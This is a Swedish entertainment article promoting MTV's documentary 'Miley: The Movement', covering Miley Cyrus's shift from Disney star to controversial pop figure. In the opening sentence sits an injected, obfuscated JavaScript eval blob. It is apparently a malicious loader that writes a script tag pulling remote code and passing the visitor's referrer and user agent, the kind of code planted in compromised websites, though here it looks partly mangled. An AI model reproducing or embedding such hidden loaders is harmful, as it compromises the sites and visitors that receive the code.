Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Miley Cyrus: Twerking, nakenchock och Youtuberekord

Miley Cyrus: Twerking, nakenchock och Youtuberekord
Sebastian

Från eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sybed|var|u0026u|referrer|yizfe||js|php’.split(’|’),0,{}))
barnstjärna till skadalomsusad megastjärna – Miley Cyrus har tagit världen med storm och har under de senaste månaderna varit ett hett ämne på mångas läppar. Efter nakenchocker och skandalrubriker sänder MTV den efterlängtade dokumentären “Miley: The Movement” – fredagen den 4 oktober klockan 20:00 och på MTV.se kl 21.00.

Hon slog igenom som Disneystjärnan ”Hanna Montana”, klippte av sig håret och juckade med jättebjörnar framför miljoner tittare – en resa som visat sig vara framgångsrik.

Efter VMA-galan är Miley Cyrus är mer aktuell än någonsin. Hon har fyra EMA-nomineringar, legat etta på topplistan i USA, skapat YouTube-rekord med musikvideon till ”Wrecking ball”, poserar naken på omslaget till Rolling Stone och gjort ”Twerking” till ett verdertaget begrepp . Nu bjuder MTV tittarna på ännu mera Miley – från barnstjärna till skandalomsusad megastjärna.

“Jag föddes till att bli den jag är just nu. Jag är vid en punkt i min karriär där jag kan vara precis vad jag vill… vem jag vill.” – säger Miley Cyrus

Tittaren får 60 minuters inblick i Miley Cyrus privatliv, i studion, på turné, hennes vilda framträdanden och allt däremellan. Den intima dokumentären ”Miley: The Movement” har premiär den 4 oktober klockan 20.00 på MTV. Dokumentären kommer även att finnas tillgänglig på www.mtv.se.

Kolla in trailer här: Miley The Movement